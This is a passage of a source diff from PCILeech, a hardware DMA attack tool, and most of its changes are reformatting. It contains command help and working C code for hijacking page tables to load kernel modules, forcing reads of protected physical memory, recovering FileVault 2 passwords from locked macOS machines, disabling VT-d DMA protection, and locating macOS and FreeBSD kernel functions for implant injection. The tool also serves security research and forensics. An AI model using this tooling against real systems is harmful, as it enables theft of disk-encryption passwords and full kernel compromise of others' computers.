+            " OPTIONS : -min                                                                \n" \
+            " The memory contents of a single page (4096 bytes) is shown on screen. Use the \n" \
+            " -min option to specify the memory location. If the -min option is not aligned \n" \
+            " the specified memory address will be truncated. It is also possible to force  \n" \
+            " reading of otherwise inaccessible memory with the -force option.              \n" \
+            " EXAMPLES:      (example kernel module is loaded at address 0x7fffe000)        \n" \
+            " 1) display the page starting at physical address 0x1000.                      \n" \
+            "    pcileech pagedisplay -min 0x1000                                           \n" \
+            " 2) display the normally restricted page at physical address 0xf0000.          \n" \
+            "    pcileech pagedisplay -min 0xf0000 -force                                   \n" \
+            " 3) display the page at address 0x140000000 (5GB).                             \n" \
+            "    pcileech pagedisplay -min 0x140000000 -kmd 0x7fffe000                      \n");
+        break;
+    case TESTMEMREAD:
+    case TESTMEMREADWRITE:
+        printf(
+            " TEST READING AND/OR READING+WRITING TO A PHYSICAL MEMORY ADDRESS.             \n" \
+            " MODES   : DMA                                                                 \n" \
+            " Used for debug purposes. Test reading and/or reading+writing to a physical    \n" \
+            " memory address with DMA. The address page read and optionally written to is   \n" \
+            " specified by the -min option. If the address is inside a protected range then \n" \
+            " the -force option could be specified to override. A number of reads and writes\n" \
+            " are executed. Unless there is a catastrophic failure the page is restored to  \n" \
+            " its original state after testing writes with testmemreadwrite.                \n" \
+            " EXAMPLES:                                                                     \n" \
+            " 1) test reading from the memory address at 0x1000                             \n" \
+            "    pcileech testmemread -min 0x1000                                           \n" \
+            " 1) test reading from the normally protected address 0xf4000000                \n" \
+            "    pcileech testmemread -min 0xf4000000 -force                                \n" \
+            " 2) test reading and writing to/from the memory address 0x1000                 \n" \
+            "    pcileech testmemreadwrite -min 0x1000                                      \n");
+        break;
+    case KMDLOAD:
+        printf(
+            " LOAD A KERNEL MODULE INTO THE OPERATING SYSTEM KERNEL FOR LATER USE.          \n" \
+            " MODES   : DMA                                                                 \n" \
+            " OPTIONS : -kmd, -pt, -cr3                                                     \n" \
+            " Load a kernel module into the running operating system kernel for later use.  \n" \
+            " The kernel module is specified in the -kmd paramter. If the specified kernel  \n" \
+            " module is generic and memory searches are supported it will be searched for   \n" \
+            " in memory. Specialized windows 10 kernel module are loaded by hi-jacking the  \n" \
+            " page table. The page table is searched for automatically with the -pt option. \n" \
+            " The page table base may also optionally be specified in the -cr3 option.      \n" \
+            " EXAMPLES:                                                                     \n" \
+            " 1) load a kernel module into Windows Vista by specifying a generic signature. \n" \
+            "    pcileech kmdload -kmd winvistax64                                          \n" \
+            " 2) load a kernel module into Linux by specifying a generic signature.         \n" \
+            "    pcileech kmdload -kmd LINUX_X64                                            \n" \
+            " 3) load a kernel module into Windows 10 by targeting a specific driver.       \n" \
+            "    pcileech kmdload -kmd win10x64_ntfs_20160716 -pt                           \n");
+        break;
+    case KMDEXIT:
+        printf(
+            " UNLOAD AN ACTIVE KERNEL MODULE FROM THE TARGET SYSTEM.                        \n" \
+            " MODES   : KMD                                                                 \n" \
+            " OPTIONS :                                                                     \n" \
+            " Unload an active kernel module from the target system. The already active     \n" \
+            " kernel module is asked to terminate and clean up itself as best as possible.  \n" \
+            " After running the kmdexit command it will not be possible to access the       \n" \
+            " kernel module any more.                                                       \n" \
+            " EXAMPLES:      (example kernel module is loaded at address 0x7fffe000)        \n" \
+            " 1) unload the already loaded kernel module.                                   \n" \
+            "    pcileech kmdexit -kmd 0x7fffe000                                           \n");
+        break;
+    case MAC_FVRECOVER:
+        printf(
+            " RECOVER FILEVAULT 2 PASSWORD FROM A LOCKED macOS SYSTEM.                      \n" \
+            " MODES   : DMA                                                                 \n" \
+            " OPTIONS :                                                                     \n" \
+            " Plug in the PCILeech device to any macOS system with a Thunderbolt 2 port. You\n" \
+            " will be asked to reboot if PCILeech is ready. After the reboot PCILeech will  \n" \
+            " try to figure out the filevault 2 full disk encryption password used to unlock\n" \
+            " the disk crypto. This issue has been patched in macOS Sierra 10.12.2.         \n" \
+            " A small memory dump will also be written to disk. In case PCILeech is uable to\n" \
+            " automatically figure out the password this memory dump may be used. In order  \n" \
+            " for PCILeech to figure out the password only ascii characters may be used; if \n" \
+            " other unicode characters exist in the password PCILeech will not be able to   \n" \
+            " automatically recover the password. (CVE-2016-7585).                          \n" \
+            " EXAMPLES:                                                                     \n" \
+            " 1) recover the filevault 2 disk encryption password.                          \n" \
+            "    pcileech mac_fvrecover                                                     \n");
+        break;
+    case MAC_FVRECOVER2:
+        printf(
+            " RECOVER FILEVAULT 2 PASSWORD FROM A macOS SYSTEM IMMEDIATELY AFTER UNLOCK.    \n" \
+            " MODES   : DMA                                                                 \n" \
+            " OPTIONS :                                                                     \n" \
+            " Plug in the PCILeech device to any macOS system with a Thunderbolt 2 port.    \n" \
+            " Wait for the user to enter the filefault 2 password to unlock the computer.   \n" \
+            " Immediately after unlock VT-d DMA protections are dropped for a short while   \n" \
+            " and the password can be recovered in a similar way to the MAV_FVRECOVER       \n" \
+            " command. (CVE-2016-7585).                                                     \n" \
+            " EXAMPLES:                                                                     \n" \
+            " 1) recover the filevault 2 disk encryption password immediately after unlock. \n" \
+            "    pcileech mac_fvrecover2                                                    \n");
+        break;
+    case MAC_DISABLE_VTD:
+        printf(
+            " DISABLE Vt-d DMA PROTECTIONS IMMEDIATELY AFTER macOS BOOT.                    \n" \
+            " MODES   : DMA                                                                 \n" \
+            " OPTIONS :                                                                     \n" \
+            " Plug in the PCILeech device to any macOS system with a Thunderbolt 2 port.    \n" \
+            " Wait for the user to enter the filefault 2 password to unlock the computer.   \n" \
+            " Immediately after unlock VT-d DMA protections are dropped for a short while   \n" \
+            " and it is possible to disable the in-memory DMAR ACPI table - which results   \n" \
+            " in completely disabled VT-d protections until the computer is rebooted.       \n" \
+            " (CVE-2016-7585).                                                              \n" \
+            " EXAMPLES:                                                                     \n" \
+            " 1) disable Vt-d DMA protections immediately after macOS boot.                 \n" \
+            "    pcileech mac_disablevtd                                                    \n");
+        break;
+    case PT_PHYS2VIRT:
+        printf(
+            " SEARCH FOR VIRTUAL ADDRESS MAPPED TO GIVEN PHYSICAL ADDRESS.                  \n" \
+            " MODES   : DMA, KMD                                                            \n" \
+            " OPTIONS : -cr3, -0                                                            \n" \
+            " Walk the page table of which base is specified on the 'cr3' option to find the\n" \
+            " first occurrence of a virtual address mapped to the physical address specified\n" \
+            " in the '0' option. If an entry is found the virtual address and the PTE will  \n" \
+            " be displayed. Only the first occurrence will be displayed.                    \n" \
+            " EXAMPLEs:                                                                     \n" \
+            " 1) search for virtual address mapped to physical 0xfed90000 given a page table\n" \
+            "    (PML4) base at: 0x1aa000.                                                  \n" \
+            "    pcileech pt_phys2virt -cr3 0x1aa000 -0 0xfed90000                          \n");
+        break;
+    case PT_VIRT2PHYS:
+        printf(
+            " RETRIEVE PHYSICAL ADDRESS THAT VIRTUAL ADDRESS RESOLVES TO.                   \n" \
+            " MODES   : DMA, KMD                                                            \n" \
+            " OPTIONS : -cr3, -0                                                            \n" \
+            " Retrieve the physical address that the virtual address resolves to.  The Phys-\n" \
+            " ical address of the CR3 register is specified in '-cr3' parameter. The virtual\n" \
+            " address is specified in the '-0' option.                                      \n" \
+            " EXAMPLEs:                                                                     \n" \
+            " 1) search for physical address mapped by virtual 0xfffff80000fed000.          \n" \
+            "    (PML4) base at: 0x1aa000.                                                  \n" \
+            "    pcileech pt_virt2phys -cr3 0x1aa000 -0 0xfffff80000fed000                  \n");
+        break;
+    case TLP:
+        printf(
+            " TRANSMIT AND RECEIVE RAW PCIe TLPs                                            \n" \
+            " MODES   : DMA                                                                 \n" \
+            " OPTIONS : -in, -vv, -wait                                                     \n" \
+            " Transmit and receive PCIe TLPs. Requires supported devices such as the SP605. \n" \
+            " The USB3380 is not a supported device. Multiple TLPs may be stacked. If not   \n" \
+            " specifying an -in parameter no TLP will be sent. Specify the -vv setting to   \n" \
+            " display received and sent TLPs. The default listen time is 0.5s, if a longer  \n" \
+            " listen time is required specify it with the -wait parameter.                  \n" \
+            " Supported only when running PCILeech on Windows.                              \n" \
+            " EXAMPLEs:                                                                     \n" \
+            " 1) Listen for incoming TLPs for 10s:                                          \n" \
+            "    pcileech -vv -wait 10                                                      \n");
+        break;
+    case PROBE:
+        printf(
+            " PROBE MEMORY FOR READABLE PAGES                                               \n" \
+            " MODES   : DMA                                                                 \n" \
+            " Probe a memory region specified by defaults or -min, -max for readable pages. \n" \
+            " This is done in a device-effifient manner. Probing is performed in DMA mode.  \n" \
+            " The USB3380 is not a supported device.                                        \n" \
+            " EXAMPLEs:                                                                     \n" \
+            " 1) Probe memory up to 10GB                                                    \n" \
+            "    pcileech probe -max 0x280000000                                            \n");
+        break;
+    case IDENTIFY:
+        printf(
+            " TRY TO IDENTIFY OPERATING SYSTEM IMPORTANT INFORMATION IN MEMORY IMAGE        \n" \
+            " MODES   : DMA                                                                 \n" \
+            " Scans the memory to identify important operatins system specific information  \n" \
+            " such as page directory bases (that can be used with the mount command).       \n" \
+            " Currently only Windows is supported. USB3380 devices are not supported        \n" \
+            " EXAMPLEs:                                                                     \n" \
+            " 1) Scan for process page directories                                          \n" \
+            "    pcileech identify                                                          \n");
+        break;
+    case EXEC:
+        _HelpShowExecCommand(pCfg);
+        break;
+    default:
+        printf(
+            " Detailed help for this command or implant is not available.                   \n");
+        break;
+    }
 }
diff --git a/pcileech/kmd.c b/pcileech/kmd.c
index a97fe3a..d3abcd6 100644
--- a/pcileech/kmd.c
+++ b/pcileech/kmd.c
@@ -1,6 +1,6 @@
 // kmd.c : implementation related to operating systems kernel modules functionality.
 //
-// (c) Ulf Frisk, 2016, 2017
+// (c) Ulf Frisk, 2016-2018
 // Author: Ulf Frisk, pcileech@frizk.net
 //
 #include "kmd.h"
@@ -9,29 +9,29 @@
 #include "executor.h"
 
 typedef struct tdKMDHANDLE_S12 {
-	QWORD qwPageAddr;
-	DWORD dwPageOffset;
-	BYTE pbOrig[4096];
-	BYTE pbPatch[4096];
-	BYTE pbLatest[4096];
-	QWORD qwPTE;
-	QWORD qwPTEOrig;
-	QWORD qwPTEAddrPhys;
+    QWORD qwPageAddr;
+    DWORD dwPageOffset;
+    BYTE pbOrig[4096];
+    BYTE pbPatch[4096];
+    BYTE pbLatest[4096];
+    QWORD qwPTE;
+    QWORD qwPTEOrig;
+    QWORD qwPTEAddrPhys;
 } KMDHANDLE_S12, *PKMDHANDLE_S12;
 
 typedef struct tdKERNELSEEKER {
-	PBYTE pbSeek;
-	DWORD cbSeek;
-	DWORD aSeek;
-	DWORD aTableEntry;
-	QWORD vaSeek;
-	QWORD vaFn;
+    PBYTE pbSeek;
+    DWORD cbSeek;
+    DWORD aSeek;
+    DWORD aTableEntry;
+    QWORD vaSeek;
+    QWORD vaFn;
 } KERNELSEEKER, *PKERNELSEEKER;
 
-#define STAGE1_OFFSET_CALL_ADD			1
-#define STAGE2_OFFSET_STAGE3_PHYSADDR	4
-#define STAGE2_OFFSET_FN_STAGE1_ORIG	8
-#define STAGE2_OFFSET_EXTRADATA1		16
+#define STAGE1_OFFSET_CALL_ADD          1
+#define STAGE2_OFFSET_STAGE3_PHYSADDR   4
+#define STAGE2_OFFSET_FN_STAGE1_ORIG    8
+#define STAGE2_OFFSET_EXTRADATA1        16
 
 BOOL KMD_GetPhysicalMemoryMap(_Inout_ PPCILEECH_CONTEXT ctx);
 BOOL KMD_SetupStage3(_Inout_ PPCILEECH_CONTEXT ctx, _In_ DWORD dwPhysicalAddress, _In_ PBYTE pbStage3, _In_ DWORD cbStage3);
@@ -42,74 +42,74 @@ BOOL KMD_SetupStage3(_Inout_ PPCILEECH_CONTEXT ctx, _In_ DWORD dwPhysicalAddress
 
 BOOL KMD_FindSignature2(_Inout_ PBYTE pbPages, _In_ DWORD cPages, _In_ QWORD qwAddrBase, _Inout_ PSIGNATURE pSignatures, _In_ DWORD cSignatures, _Out_ PDWORD pdwSignatureMatch)
 {
-	PBYTE pb;
-	DWORD pgIdx, i, j;
-	PSIGNATURE ps;
-	QWORD qwAddressCurrent;
-	for(pgIdx = 0; pgIdx < cPages; pgIdx++) {
-		pb = pbPages + (4096 * pgIdx);
-		qwAddressCurrent = qwAddrBase + (4096 * pgIdx);
-		for(i = 0; i < cSignatures; i++) {
-			ps = pSignatures + i;
-			for(j = 0; j < 2; j++) {
-				if(ps->chunk[j].qwAddress) { // already processed and found - continue
-					continue;
-				}
-				if((ps->chunk[j].cbOffset > 0xfff) && ((ps->chunk[j].cbOffset & ~0xfff) != qwAddressCurrent)) {
-					continue;
-				}
-				if(!ps->chunk[j].cb || !memcmp(pb + (ps->chunk[j].cbOffset & 0xfff), ps->chunk[j].pb, ps->chunk[j].cb)) {
-					ps->chunk[j].cb = 4096;
-					memcpy(ps->chunk[j].pb, pb, 4096);
-					ps->chunk[j].qwAddress = qwAddressCurrent;
-				}
-			}
-			if(ps->chunk[0].qwAddress && ps->chunk[1].qwAddress) {
-				*pdwSignatureMatch = i;
-				return TRUE;
-			}
-		}
-	}
-	return FALSE;
+    PBYTE pb;
+    DWORD pgIdx, i, j;
+    PSIGNATURE ps;
+    QWORD qwAddressCurrent;
+    for(pgIdx = 0; pgIdx < cPages; pgIdx++) {
+        pb = pbPages + (4096 * pgIdx);
+        qwAddressCurrent = qwAddrBase + (4096 * pgIdx);
+        for(i = 0; i < cSignatures; i++) {
+            ps = pSignatures + i;
+            for(j = 0; j < 2; j++) {
+                if(ps->chunk[j].qwAddress) { // already processed and found - continue
+                    continue;
+                }
+                if((ps->chunk[j].cbOffset > 0xfff) && ((ps->chunk[j].cbOffset & ~0xfff) != qwAddressCurrent)) {
+                    continue;
+                }
+                if(!ps->chunk[j].cb || !memcmp(pb + (ps->chunk[j].cbOffset & 0xfff), ps->chunk[j].pb, ps->chunk[j].cb)) {
+                    ps->chunk[j].cb = 4096;
+                    memcpy(ps->chunk[j].pb, pb, 4096);
+                    ps->chunk[j].qwAddress = qwAddressCurrent;
+                }
+            }
+            if(ps->chunk[0].qwAddress && ps->chunk[1].qwAddress) {
+                *pdwSignatureMatch = i;
+                return TRUE;
+            }
+        }
+    }
+    return FALSE;
 }
 
 BOOL KMD_FindSignature1(_Inout_ PPCILEECH_CONTEXT ctx, _Inout_ PSIGNATURE pSignatures, _In_ DWORD cSignatures, _Out_ PDWORD pdwSignatureMatchIdx)
 {
-	QWORD i, qwAddrMax, qwAddrCurrent = max(0x100000, ctx->cfg->qwAddrMin);
-	PBYTE pbBuffer8M;
-	BOOL result;
-	PAGE_STATISTICS pageStat;
-	// special case (fixed memory location && zero signature byte length)
-	for(i = 0; i < cSignatures; i++) {
-		if((pSignatures[i].chunk[0].cbOffset > 0xfff) && (pSignatures[i].chunk[0].cb == 0) && (pSignatures[i].chunk[1].cbOffset > 0xfff) && (pSignatures[i].chunk[1].cb == 0)) {
-			pSignatures[i].chunk[0].qwAddress = pSignatures[i].chunk[0].cbOffset & ~0xFFF;
-			pSignatures[i].chunk[1].qwAddress = pSignatures[i].chunk[1].cbOffset & ~0xFFF;
-			return TRUE;
-		}
-	}
-	// initialize / allocate memory / load signatures
-	if(!(pbBuffer8M = LocalAlloc(0, 0x800000))) {
-		return FALSE;
-	}
-	// loop kmd-find
-	qwAddrMax = min(ctx->cfg->qwAddrMax, ctx->cfg->dev.qwAddrMaxNative);
-	PageStatInitialize(&pageStat, qwAddrCurrent, qwAddrMax, "Searching for KMD location", FALSE, FALSE);
-	while(qwAddrCurrent < qwAddrMax) {
-		pageStat.qwAddr = qwAddrCurrent;
-		if(DeviceReadDMAEx(ctx, qwAddrCurrent, pbBuffer8M, 0x800000, &pageStat, 0)) {
-			result = KMD_FindSignature2(pbBuffer8M, 2048, qwAddrCurrent, pSignatures, cSignatures, pdwSignatureMatchIdx);
-			if(result) {
-				LocalFree(pbBuffer8M);
-				pageStat.szAction = "Waiting for KMD to activate";
-				PageStatClose(&pageStat);
-				return TRUE;
-			}
-		}
-		qwAddrCurrent += 0x800000;
-	}
-	LocalFree(pbBuffer8M);
-	PageStatClose(&pageStat);
-	return FALSE;
+    QWORD i, qwAddrMax, qwAddrCurrent = max(0x100000, ctx->cfg->qwAddrMin);
+    PBYTE pbBuffer8M;
+    BOOL result;
+    PAGE_STATISTICS pageStat;
+    // special case (fixed memory location && zero signature byte length)
+    for(i = 0; i < cSignatures; i++) {
+        if((pSignatures[i].chunk[0].cbOffset > 0xfff) && (pSignatures[i].chunk[0].cb == 0) && (pSignatures[i].chunk[1].cbOffset > 0xfff) && (pSignatures[i].chunk[1].cb == 0)) {
+            pSignatures[i].chunk[0].qwAddress = pSignatures[i].chunk[0].cbOffset & ~0xFFF;
+            pSignatures[i].chunk[1].qwAddress = pSignatures[i].chunk[1].cbOffset & ~0xFFF;
+            return TRUE;
+        }
+    }
+    // initialize / allocate memory / load signatures
+    if(!(pbBuffer8M = LocalAlloc(0, 0x800000))) {
+        return FALSE;
+    }
+    // loop kmd-find
+    qwAddrMax = min(ctx->cfg->qwAddrMax, ctx->cfg->dev.qwAddrMaxNative);
+    PageStatInitialize(&pageStat, qwAddrCurrent, qwAddrMax, "Searching for KMD location", FALSE, FALSE);
+    while(qwAddrCurrent < qwAddrMax) {
+        pageStat.qwAddr = qwAddrCurrent;
+        if(DeviceReadDMAEx(ctx, qwAddrCurrent, pbBuffer8M, 0x800000, &pageStat, 0)) {
+            result = KMD_FindSignature2(pbBuffer8M, 2048, qwAddrCurrent, pSignatures, cSignatures, pdwSignatureMatchIdx);
+            if(result) {
+                LocalFree(pbBuffer8M);
+                pageStat.szAction = "Waiting for KMD to activate";
+                PageStatClose(&pageStat);
+                return TRUE;
+            }
+        }
+        qwAddrCurrent += 0x800000;
+    }
+    LocalFree(pbBuffer8M);
+    PageStatClose(&pageStat);
+    return FALSE;
 }
 
 // EFI RUNTIME SERVICES TABLE SIGNATURE (see UEFI specification (2.6) for detailed information).
@@ -117,42 +117,42 @@ BOOL KMD_FindSignature1(_Inout_ PPCILEECH_CONTEXT ctx, _Inout_ PSIGNATURE pSigna
 
 BOOL KMD_FindSignature_EfiRuntimeServices(_Inout_ PPCILEECH_CONTEXT ctx, _Out_ PQWORD pqwAddrPhys)
 {
-	BOOL result = FALSE;
-	QWORD o, qwCurrentAddress;
-	PAGE_STATISTICS pageStat;
-	PBYTE pbBuffer16M;
-	if(!(pbBuffer16M = LocalAlloc(0, 0x01000000))) {
-		return FALSE;
-	}
-	ctx->cfg->qwAddrMin &= ~0xfff;
-	ctx->cfg->qwAddrMax = (ctx->cfg->qwAddrMax + 1) & ~0xfff;
-	if(ctx->cfg->qwAddrMax == 0) {
-		ctx->cfg->qwAddrMax = 0x100000000;
-	}
-	qwCurrentAddress = ctx->cfg->qwAddrMin;
-	PageStatInitialize(&pageStat, ctx->cfg->qwAddrMin, ctx->cfg->qwAddrMax, "Searching for EFI Runtime Services", ctx->phKMD ? TRUE : FALSE, ctx->cfg->fVerbose);
-	while(qwCurrentAddress < ctx->cfg->qwAddrMax) {
-		result = Util_Read16M(ctx, pbBuffer16M, qwCurrentAddress, &pageStat);
-		if(!result && !ctx->cfg->fForceRW && !ctx->phKMD) {
-			goto cleanup;
-		}
-		for(o = 0x18; o < 0x01000000 - 0x88; o += 8) {
-			// EFI RUNTIME SERVICES TABLE SIGNATURE (see UEFI specification (2.6) for detailed information).
-			// 0x30646870 == phd0 EFI memory artifact required to rule out additional false positives.
-			if((*(PDWORD)(pbBuffer16M + o - 0x18) == 0x30646870) && IS_SIGNATURE_EFI_RUNTIME_SERVICES(pbBuffer16M + o)) {
-				pageStat.szAction = "Waiting for EFI Runtime Services";
-				*pqwAddrPhys = qwCurrentAddress + o;
-				result = TRUE;
-				goto cleanup;
-			}
-		}
-		// add to address
-		qwCurrentAddress += 0x01000000;
-	}
+    BOOL result = FALSE;
+    QWORD o, qwCurrentAddress;
+    PAGE_STATISTICS pageStat;
+    PBYTE pbBuffer16M;
+    if(!(pbBuffer16M = LocalAlloc(0, 0x01000000))) {
+        return FALSE;
+    }
+    ctx->cfg->qwAddrMin &= ~0xfff;
+    ctx->cfg->qwAddrMax = (ctx->cfg->qwAddrMax + 1) & ~0xfff;
+    if(ctx->cfg->qwAddrMax == 0) {
+        ctx->cfg->qwAddrMax = 0x100000000;
+    }
+    qwCurrentAddress = ctx->cfg->qwAddrMin;
+    PageStatInitialize(&pageStat, ctx->cfg->qwAddrMin, ctx->cfg->qwAddrMax, "Searching for EFI Runtime Services", ctx->phKMD ? TRUE : FALSE, ctx->cfg->fVerbose);
+    while(qwCurrentAddress < ctx->cfg->qwAddrMax) {
+        result = Util_Read16M(ctx, pbBuffer16M, qwCurrentAddress, &pageStat);
+        if(!result && !ctx->cfg->fForceRW && !ctx->phKMD) {
+            goto cleanup;
+        }
+        for(o = 0x18; o < 0x01000000 - 0x88; o += 8) {
+            // EFI RUNTIME SERVICES TABLE SIGNATURE (see UEFI specification (2.6) for detailed information).
+            // 0x30646870 == phd0 EFI memory artifact required to rule out additional false positives.
+            if((*(PDWORD)(pbBuffer16M + o - 0x18) == 0x30646870) && IS_SIGNATURE_EFI_RUNTIME_SERVICES(pbBuffer16M + o)) {
+                pageStat.szAction = "Waiting for EFI Runtime Services";
+                *pqwAddrPhys = qwCurrentAddress + o;
+                result = TRUE;
+                goto cleanup;
+            }
+        }
+        // add to address
+        qwCurrentAddress += 0x01000000;
+    }
 cleanup:
-	LocalFree(pbBuffer16M);
-	PageStatClose(&pageStat);
-	return result;
+    LocalFree(pbBuffer16M);
+    PageStatClose(&pageStat);
+    return result;
 }
 
 //-------------------------------------------------------------------------------
@@ -161,65 +161,65 @@ BOOL KMD_FindSignature_EfiRuntimeServices(_Inout_ PPCILEECH_CONTEXT ctx, _Out_ P
 
 BOOL KMD_MacOSIsKernelAddress(_In_ PBYTE pbPage)
 {
-	DWORD i;
-	if(*(PDWORD)pbPage != 0xfeedfacf) { return FALSE; } // mach_header_64 magic
-	if(*(PDWORD)(pbPage + 4) != 0x01000007) { return FALSE; } // mach_header_64 cputype
-	// search for kernel header data (eliminate other macho-headers)
-	for(i = 0x20; i < 0xfc0; i += 8) {
-		if(*(PQWORD)(pbPage + i) == 0x5450746f6F625F5F) { // __bootPT
-			return TRUE;
-		}
-	}
-	return FALSE;
+    DWORD i;
+    if(*(PDWORD)pbPage != 0xfeedfacf) { return FALSE; } // mach_header_64 magic
+    if(*(PDWORD)(pbPage + 4) != 0x01000007) { return FALSE; } // mach_header_64 cputype
+    // search for kernel header data (eliminate other macho-headers)
+    for(i = 0x20; i < 0xfc0; i += 8) {
+        if(*(PQWORD)(pbPage + i) == 0x5450746f6F625F5F) { // __bootPT
+            return TRUE;
+        }
+    }
+    return FALSE;
 }
 
 BOOL KMD_MacOSKernelGetBase(_Inout_ PPCILEECH_CONTEXT ctx, _Out_ PDWORD pdwKernelBase, _Out_ PDWORD pdwTextHIB, _Out_ PDWORD pcbTextHIB)
 {
-	BYTE pbPage[4096];
-	DWORD i, cKSlide;
-	for(cKSlide = 1; cKSlide <= 512; cKSlide++) {
-		*pdwKernelBase = cKSlide * 0x00200000; // KASLR = ([RND:1..512] * 0x00200000)
-		if(!DeviceReadDMA(ctx, *pdwKernelBase, pbPage, 4096, PCILEECH_MEM_FLAG_RETRYONFAIL)) {
-			printf("KMD: Failed. Error reading address: 0x%08x\n", *pdwKernelBase);
-			return FALSE;
-		}
-		if(KMD_MacOSIsKernelAddress(pbPage)) {
-			for(i = 0x20; i < 0xfc0; i += 8) {
-				if(*(PQWORD)(pbPage + i) == 0x0000747865745F5F && *(PQWORD)(pbPage + i + 0x10) == 0x0000004249485F5F) { // __text && __HIB
-					*pdwTextHIB = (DWORD)*(PQWORD)(pbPage + i + 0x20);
-					*pcbTextHIB = (DWORD)*(PQWORD)(pbPage + i + 0x28);
-					return TRUE;
-				}
-			}
-		}
-	}
-	return FALSE;
+    BYTE pbPage[4096];
+    DWORD i, cKSlide;
+    for(cKSlide = 1; cKSlide <= 512; cKSlide++) {
+        *pdwKernelBase = cKSlide * 0x00200000; // KASLR = ([RND:1..512] * 0x00200000)
+        if(!DeviceReadDMA(ctx, *pdwKernelBase, pbPage, 4096, PCILEECH_MEM_FLAG_RETRYONFAIL)) {
+            printf("KMD: Failed. Error reading address: 0x%08x\n", *pdwKernelBase);
+            return FALSE;
+        }
+        if(KMD_MacOSIsKernelAddress(pbPage)) {
+            for(i = 0x20; i < 0xfc0; i += 8) {
+                if(*(PQWORD)(pbPage + i) == 0x0000747865745F5F && *(PQWORD)(pbPage + i + 0x10) == 0x0000004249485F5F) { // __text && __HIB
+                    *pdwTextHIB = (DWORD)*(PQWORD)(pbPage + i + 0x20);
+                    *pcbTextHIB = (DWORD)*(PQWORD)(pbPage + i + 0x28);
+                    return TRUE;
+                }
+            }
+        }
+    }
+    return FALSE;
 }
 
 BOOL KMD_MacOSKernelSeekSignature(_Inout_ PPCILEECH_CONTEXT ctx, _Out_ PSIGNATURE pSignature)
 {
-	const BYTE SIGNATURE_BCOPY[] = { 0x48, 0x87, 0xF7, 0x48, 0x89, 0xD1, 0x48, 0x89, 0xF8, 0x48, 0x29, 0xF0, 0x48, 0x39, 0xC8, 0x72 };
-	DWORD i, dwKernelBase, dwTextHIB, cbTextHIB;
-	PBYTE pbTextHIB;
-	if(!KMD_MacOSKernelGetBase(ctx, &dwKernelBase, &dwTextHIB, &cbTextHIB)) {
-		return FALSE;
-	}
-	cbTextHIB = (cbTextHIB + 0xfff) & 0xfffff000;
-	pbTextHIB = LocalAlloc(0, cbTextHIB);
-	if(!pbTextHIB) { return FALSE; }
-	if(!DeviceReadDMAEx(ctx, dwTextHIB, pbTextHIB, cbTextHIB, NULL, 0)) {
-		LocalFree(pbTextHIB);
-		return FALSE;
-	}
-	for(i = 0; i < cbTextHIB - 0x300; i++) {
-		if(0 == memcmp(pbTextHIB + i, SIGNATURE_BCOPY, 16)) {
-			Util_CreateSignatureMacOSGeneric(dwKernelBase, dwTextHIB + i, dwTextHIB + cbTextHIB - 0x300, pSignature);
-			LocalFree(pbTextHIB);
-			return TRUE;
-		}
-	}
-	LocalFree(pbTextHIB);
-	return FALSE;
+    const BYTE SIGNATURE_BCOPY[] = { 0x48, 0x87, 0xF7, 0x48, 0x89, 0xD1, 0x48, 0x89, 0xF8, 0x48, 0x29, 0xF0, 0x48, 0x39, 0xC8, 0x72 };
+    DWORD i, dwKernelBase, dwTextHIB, cbTextHIB;
+    PBYTE pbTextHIB;
+    if(!KMD_MacOSKernelGetBase(ctx, &dwKernelBase, &dwTextHIB, &cbTextHIB)) {
+        return FALSE;
+    }
+    cbTextHIB = (cbTextHIB + 0xfff) & 0xfffff000;
+    pbTextHIB = LocalAlloc(0, cbTextHIB);
+    if(!pbTextHIB) { return FALSE; }
+    if(!DeviceReadDMAEx(ctx, dwTextHIB, pbTextHIB, cbTextHIB, NULL, 0)) {
+        LocalFree(pbTextHIB);
+        return FALSE;
+    }
+    for(i = 0; i < cbTextHIB - 0x300; i++) {
+        if(0 == memcmp(pbTextHIB + i, SIGNATURE_BCOPY, 16)) {
+            Util_CreateSignatureMacOSGeneric(dwKernelBase, dwTextHIB + i, dwTextHIB + cbTextHIB - 0x300, pSignature);
+            LocalFree(pbTextHIB);
+            return TRUE;
+        }
+    }
+    LocalFree(pbTextHIB);
+    return FALSE;
 }
 
 //-------------------------------------------------------------------------------
@@ -228,46 +228,46 @@ BOOL KMD_MacOSKernelSeekSignature(_Inout_ PPCILEECH_CONTEXT ctx, _Out_ PSIGNATUR
 
 BOOL KMD_FreeBSDKernelSeekSignature(_Inout_ PPCILEECH_CONTEXT ctx, _Out_ PSIGNATURE pSignature)
 {
-	DWORD i, dwo_memcpy_str, dwo_strtab, dwa_memcpy;
-	PBYTE pb64M = LocalAlloc(LMEM_ZEROINIT, 0x04000000);
-	if(!pb64M) { return FALSE; }
-	for(i = 0x01000000; i < 0x04000000; i += 0x01000000) {
-		DeviceReadDMAEx(ctx, i, pb64M + i, 0x01000000, NULL, 0);
-	}
-	// 1: search for string 'vn_open'
-	i = 0;
-	while(TRUE) {
-		i++;
-		if(i > 0x04000000 - 0x1000) { goto error; }
-		if(0 == memcmp(pb64M + i, "\0vn_open", 9)) { break; }
-	}
-	dwo_memcpy_str = i + 1;
-	i = i & ~3;
-	// 2: scan backwards for base of strtab
-	while(TRUE) {
-		i -= 4;
-		if(i < 0x1000) { goto error; }
-		if(0 == *(PDWORD)(pb64M + i - 4)) { 
-			break; 
-		}
-	}
-	dwo_strtab = i;
-	i = i - 8; // skip necessary
-	// 3: scan backwards for 'vn_open' function address
-	while(TRUE) {
-		i -= 0x18;
-		if(i < 0x1000) { goto error; }
-		if(0 == *(PQWORD)(pb64M + i)) { goto error; }
-		if(dwo_memcpy_str - dwo_strtab == *(PDWORD)(pb64M + i)) { break; }
-	}
-	dwa_memcpy = *(PDWORD)(pb64M + i + 8) & 0x7fffffff;
-	// 4: create signature
-	LocalFree(pb64M);
-	Util_CreateSignatureFreeBSDGeneric(dwo_strtab, dwa_memcpy, pSignature);
-	return TRUE;
+    DWORD i, dwo_memcpy_str, dwo_strtab, dwa_memcpy;
+    PBYTE pb64M = LocalAlloc(LMEM_ZEROINIT, 0x04000000);
+    if(!pb64M) { return FALSE; }
+    for(i = 0x01000000; i < 0x04000000; i += 0x01000000) {
+        DeviceReadDMAEx(ctx, i, pb64M + i, 0x01000000, NULL, 0);
+    }
+    // 1: search for string 'vn_open'
+    i = 0;
+    while(TRUE) {
+        i++;
+        if(i > 0x04000000 - 0x1000) { goto error; }
+        if(0 == memcmp(pb64M + i, "\0vn_open", 9)) { break; }
+    }
+    dwo_memcpy_str = i + 1;
+    i = i & ~3;
+    // 2: scan backwards for base of strtab
+    while(TRUE) {
+        i -= 4;
+        if(i < 0x1000) { goto error; }
